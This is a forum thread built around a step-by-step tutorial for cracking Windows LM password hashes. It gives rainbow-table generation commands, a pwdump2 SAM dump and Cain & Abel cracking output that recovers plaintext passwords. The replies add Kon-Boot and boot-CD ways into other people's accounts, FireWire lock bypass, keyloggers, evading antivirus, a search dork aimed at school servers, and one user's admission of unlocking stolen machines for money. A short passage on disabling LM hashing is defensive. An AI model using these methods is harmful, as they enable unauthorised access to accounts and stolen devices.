------------------------------
CRACKING WINDOWS PASSWORDS
------------------------------

Well, after much umming and aahing, i bring to you, the definitive guide to hacking windows passwords of upto 14 char in a few

seconds.

------------------------------
Tool kit:
------------------------------

Rainbow Crack
pwdump2
Cain & able

------------------------------
Cliff steps:
------------------------------

1) generate rainbow tables

2) dump sam and system file

3) use cain to crack password via rainbow tables

Yes, it is THAT simple.

------------------------------
MORE DETAIL:
------------------------------

Rainbow tables, what are they? Well think of them as large files of random passwords already computed.

you can read more here:

http://www.antsight.com/zsl/rainbowcrack/

Anyways fire up rtgen and get some tables....

rtgen is a program which will generate rainbow chains, which then combine to make a rainbow table.

here are the bat files for you lazy people


rem config 1
rtgen lm alpha 1 7 0 2100 8000000 all
rtgen lm alpha 1 7 1 2100 8000000 all
rtgen lm alpha 1 7 2 2100 8000000 all
rtgen lm alpha 1 7 3 2100 8000000 all
rtgen lm alpha 1 7 4 2100 8000000 all


and


rem config 2
rtgen lm alpha-numeric 1 7 0 2400 40000000 all
rtgen lm alpha-numeric 1 7 1 2400 40000000 all
rtgen lm alpha-numeric 1 7 2 2400 40000000 all
rtgen lm alpha-numeric 1 7 3 2400 40000000 all
rtgen lm alpha-numeric 1 7 4 2400 40000000 all


config 1 should take 12 - 24hrs to generate depending on your machine, maybe even 36hrs. it will use 610mb of disk space

Config 2 should take around 5 days to generate and use 3 gigs of hdd space

commming soon will be config 3 which will take 18 gigs of space... :O

So, config 1 will be able to crack 99.904% of passwords that ONLY have alpha characters in a few seconds. I will be using these

tables for the tut, as i imagine most of you dont want to spend 5 days on rtgen.

Also, you will need to sort the files to make them more efficent

this is done via rtsort


rem config 1
rtsort lm_alpha#1-7_0_2100x8000000_all.rt
rtsort lm_alpha#1-7_1_2100x8000000_all.rt
rtsort lm_alpha#1-7_2_2100x8000000_all.rt
rtsort lm_alpha#1-7_3_2100x8000000_all.rt
rtsort lm_alpha#1-7_4_2100x8000000_all.rt



rem config 2
lm_alpha-numeric#1-7_0_2400x40000000_all.rt
lm_alpha-numeric#1-7_1_2400x40000000_all.rt
lm_alpha-numeric#1-7_2_2400x40000000_all.rt
lm_alpha-numeric#1-7_3_2400x40000000_all.rt
lm_alpha-numeric#1-7_4_2400x40000000_all.rt




So you have wasted some space, and you go, hmmm whats next.

Well we are going to dump the SAM to a file.

The SAM file is a depository for the user names and password hashes for every account on the local machine, or domain if it is a

domain controller, that wasnt too hard was it?

To do this, we are going to use a program called pwdump2

run the exe in cmd and issue this code:

pwdump2 > pass.txt

what that will do is redirect output to a file names pass.txt in the same folder as the program.

open it up: this is what it will look like:


Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe 0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:569fbcadc4ce9874da275e3dd3b3773 c:fdcc6716e6ec3388bc0694086538e4f2:::
RORTA:1008:c036412e27c931e297b0668eeca3a3a4:fe3105 6a1f67c9e149d60851d36d39fe:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b514 04ee:54b4144f22141ce78c44cb2e5b38b852:::
__vmware_user__:1005:aad3b435b51404eeaad3b435b5140 4ee:839a847853f36b5a0bae94bca6992ea6:::


as you can see i have removed my account and the admin one so.... note the rorta one :P

now what?

well we will fire up cain

in cain you will see a tab that says cracking, goto that one...

now on the left most column you can see a nt and ntlm hashes tab click that one

now hit the big plus sign

select import

open the pass.txt in your pwdump2 folder

highlight the accounts you want to crack and right click

select Cryptinalasys attack

press add table and then import all your rainbow tables...

then START! and wait 10 seconds....


Reading lm_alpha#1-7_0_2100x8000000_all.rt ...
... 128000000 bytes read in: 5.00 s
Verifying the file... (OK)
Searching for 2 hashes...
Plaintext of c036412e27c931e2 is RORTARU
Plaintext of 97b0668eeca3a3a4 is LES
Cryptanalysis time: 4.44 s

Username Password
------------------------------------------
RORTA RORTARULES



Lets have a little look at the output here:

As you can see 2 hashes were loaded, thats because, LM can only store 7 char in each hash the pass was 10 char so 7 in 1 hash

and 3 in the other...

this time, i went to a website that generated and i quote "secure passwords", well lets see how secure it is now....


Reading lm_alpha#1-7_0_2100x8000000_all.rt ...
... 128000000 bytes read in: 4.42 s
Verifying the file... (OK)
Searching for 2 hashes...
Plaintext of 4dcb7b0d5742450d is RLUPRI
Cryptanalysis time: 5.02 s

Reading lm_alpha#1-7_1_2100x8000000_all.rt ...
... 128000000 bytes read in: 4.66 s
Verifying the file... (OK)
Searching for 1 hash...
Cryptanalysis time: 3.91 s

Reading lm_alpha#1-7_2_2100x8000000_all.rt ...
... 128000000 bytes read in: 5.19 s
Verifying the file... (OK)
Searching for 1 hash...
Plaintext of e6ea64de82fd05a1 is WIAXOED
Cryptanalysis time: 0.49 s

Username Password
------------------------------------------
secure WIAXOEDRLUPRI



doesnt seam overly secure to me....

any questions?
:owned2:

Good Job Bio! Is there a way to prevent this happening on a PC though? And, what about the people using fingerprint scanners?

To disable this you will need to disable LM hashing on your machines, if you are using Win2k xp or 2k3, But if you are using 95, 98 or ME you cannot stop this attack.

Here is a knowledge base atricle which explains how to disable them, use the second method.

http://support.microsoft.com/default.aspx?scid=KB;EN-US;q299656&

As for finger print scanners, they dont use password hashing, they require other methods to vaildate the finger print.

A major short comming from this is, you need to have a shell on the system to pull this off.

Does this apply to Novell logins?

Currently our system lets each user login locally as a Novell profile which is deleted after log off. We also have Deepfreeze installed. Does your system bypass this?

Windows XP has been a bane in my life since we upgraded. 98 was a dream considering the programs I had to run however Autodesk and MYOB make life most difficult to run with the appropriate rights mixed with XP etc.

To my knowledge Novell doesn't use LM hashing to store passwords.

So this method doesnt apply to you. But as windows XP is used as the base, maybe the SAM file is updated with Novell accounts.

I dont have access to a novell lab till next week some time, i'll try it out and see what i can do.

Any password, given enough time, will be cracked via brute force attacks. Remeber time is infinate....

Locally the SAM file is crackable however it is hardly worth the time of the cracker as currently explicit permissions are allowed as Admin due to certain programs needing to run as Admin to function correctly. That is temporary though.

We currently run Novell Zenworks, which has only been implemented recently (due to much whinging on my part) and as far as I can tell it creates a local user login depending on the profile set up for the specific Novell group or user who is logging in.

Unfortunately I'm neither trained nor qualified to give detailed information on the workings of Novell 6.5 due to "budget restrictions". However I'm always keen to know what my adversaries are up to in regards to "hacking" Novell and Windows XP.

Mostly because I hate XP.

I remember when win95 was first released, people where
manually cracking them by some algorythm that was
simple math used to alternate Binary and ASCII. They
upgraded the Hash in 95b I think.

Most American School Infastructures use Lotus R5. It uses
RSA, so inless you have a Cluster or Supercomputer it'll
be a while. Inless they use short Key's. IBM Lotus Server
and Client embed into Windows and actually make them
more secure for Networking features.


## You won't find this on johnnyIhackstuff.
inurl:k12 ext:NSF OR NDL OR NPR OR NS3 OR NS4 OR NC5 OR NSF OR NSG OR NSH OR NTF -html
-htm -xls -mht

Is there any easy way to gain administrative control over a comp that runs off of Vista?

Glad to see you're back, Mr.A.

A lot of things have changed since you were here last.

Find the administrator password. Either by using a keylogger or by using common sense/Social Engineering.

Is there any easy way to gain administrative control over a comp that runs off of Vista?

Ophcrack works for vista by exploiting vulnerabilities in the rainbow tables, just like the OP's method.

Is there any easy way to gain administrative control over a comp that runs off of Vista?

I doubt it.

Do you have physical access to the machine in question?

Yes'm

A lot of things have changed since you were here last.




Like? :baby:

Try this (http://home.eunet.no/pnordahl/ntpasswd/).

Try this (http://home.eunet.no/pnordahl/ntpasswd/).

Thanks a lot, I was doing this for somebody else so I sent them the link. I'll let you know if it works out for them...Thanks again :):D

Try winlockpwn if the computer has a firewire port. http://storm.net.nz/projects/16

hirens boot cd, http://www.hirensbootcd.net/

its a live cd you boot to before windows starts (in bios boot from cd/dvd drive)

there is a windows password tool boot to that. then fallow the instructions and it will erase the password or change it to what you want with out knowing the old pass word.

i used this in a computer repair shop i worked at when customers would forget to give us there pass word.

im sure if you google it there are tutorials. if not messege me and i can tell you how to use it in more detail

That's what I use as well. Alot of people I know come @ me with "Hey, I forgot my password on this computer!"... When I hypothetically know it's stolen.

Quick $50.

Hirens is a great tool. Might I also suggest the Falcon Boot CD :

http://thepiratebay.org/torrent/5283510

There is a tool on here called Kon-Boot which allows you to access people's Windows accounts by bypassing their pasword - you can gain access to their accounts WITHOUT resetting the passwod.

A far more subtle approach depending on your reasons for accessing their account!

A boot CD/DVD or USB of Ophcrack works wonders for any windows XP/Vista/7 machine.
It does something with rainbow tables...

I have cracked a couple of PC's with nothing but Cain & Abel. The problem for me is that you need administrator's access. Anti-Virus also catches Cain & Abel. Is there anyway you can bypass the anti-virus?

Disable the anti-virus or run Cain & Abel in a VM?

Thinking about it, you can run C&A on a USB bootable live version of XP.

A boot CD/DVD or USB of Ophcrack works wonders for any windows XP/Vista/7 machine.
It does something with rainbow tables...

I don't understand why people go to the trouble of everything else when there's this option. I've yet to see Ophcrack take more than a few minutes on machines I've tested. Unless you're interested in learning about the logistics of how Windows stores passwords, there is no reason to do it any other way. If you just want the password in the easiest way possible, this is it.